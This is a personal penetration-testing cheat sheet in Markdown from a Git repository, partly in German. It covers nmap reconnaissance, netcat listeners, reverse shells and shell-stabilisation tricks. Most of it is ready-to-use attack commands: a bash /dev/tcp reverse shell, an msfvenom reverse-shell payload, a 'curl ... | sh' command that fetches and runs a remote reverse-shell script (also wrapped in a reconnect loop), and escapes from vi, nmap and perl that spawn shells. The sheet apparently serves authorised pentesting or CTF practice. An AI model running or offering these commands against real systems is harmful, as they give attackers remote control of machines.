Rh17S15/pentesting
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
da90202d73ee3e0f8d33ecfc2b5213d696c7a92e
pentesting/Cheatsheet.md
Rh17S15 da90202d73 expanded Cheatsheet
2025-06-15 12:31:18 +02:00

201 lines
3.4 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
#### to install:
- magic wormhole
- tldr
- rlwrap
-
```bash
sudo apt update --fix-missing && sudo apt install magic-wormhole tealdeer rlwrap
```
#### for keyring
-> if there is some kind of keyring error
```bash
sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg
```
# information gathering
### nmap
for quick scan of available ips
```bash
nmap -sn ip/24
```
to filter output for open ips
```bash
nmap -sn 192.168.1.0/24 | grep "for " | awk '{print $5}' > ips.txt
```
scan open ports:
```bash
nmap -sCV -A -p $(nmap 192.168.1.155 -p- | grep open | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/.$//') 192.168.1.155
```
#### bei windows
```bash
nmap --vuln ip
```
##### bei windows \+ smb
```bash
nmap --script vuln-smb* ip
nicht mehr sicher welches es war
nmap --script smb-vuln* ip
```
# inital access
### start listener:
```bash
rlwrap -cAr nc -nlvp 9002
```
### reverse shell bash:
```bash
/bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1
```
### reverse shell file:
```bash
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.157 LPORT=9002 -f raw -o rev.py
```
-> from revshells.com
### untested:
Reverse Shell as a Service
1. On your machine:
```bash
nc -l 1337
or nlvp?
```
2. On the target machine:
```bash
curl https://reverse-shell.sh/yourip:1337 | sh
```
#### reconnecting:
```bash
while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done
```
# privilege escalation
### always run these:
```bash
sudo -l
```
if sudo doesn't work:
[[#^78d3ce|spawn shell]]
#### check cronjobs
```bash
ls /etc/cron.*
crontab -l
```
## TTY Spawn Shell
##### if sudo still doesn't work
use
```bash
sudo -S command
```
Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.
### Python spawn shell
```bash
python -c 'import pty; pty.spawn("/bin/bash")'
```
Fully Interactive TTY
#### All the steps to stabilize your shell
**The first step:**
```bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
```
Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still wont be able to use tab autocomplete or the arrow keys.
**Step two is:**
```bash
export TERM=xterm
```
This will give us access to term commands such as clear.
**Finally (and most importantly) we will background the shell using**
```bash
Ctrl + Z
```
Back in our own terminal we use
```bash
stty raw -echo; fg
```
This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes
```bash
stty rows 38 columns 116
```
### OS system spawn shell
```bash
echo os.system("/bin/bash")
```
### Bash spawn shell
```bash
/bin/sh -i
```
### Perl spawn shell
```bash
perl —e 'exec "/bin/sh";'
```
### Ruby spawn shell
ruby: exec "/bin/sh"
### Lua spawn shell
lua: os.execute("/bin/sh")
### IRB spawn shell
exec "/bin/sh"
### VI spawn shell
```bash
:!bash
```
### VI(2) spawn shell
```bash
:set shell=/bin/bash:shell
```
### Nmap spawn shell
```bash
!sh
```
#### Exiftools
Metadaten auslesen:
```bash
exiftool picture.png
```
Binwalk (Binary Daten exportieren):
```bash
binwalk -e picture.png
```
Reference in New Issue View Git Blame Copy Permalink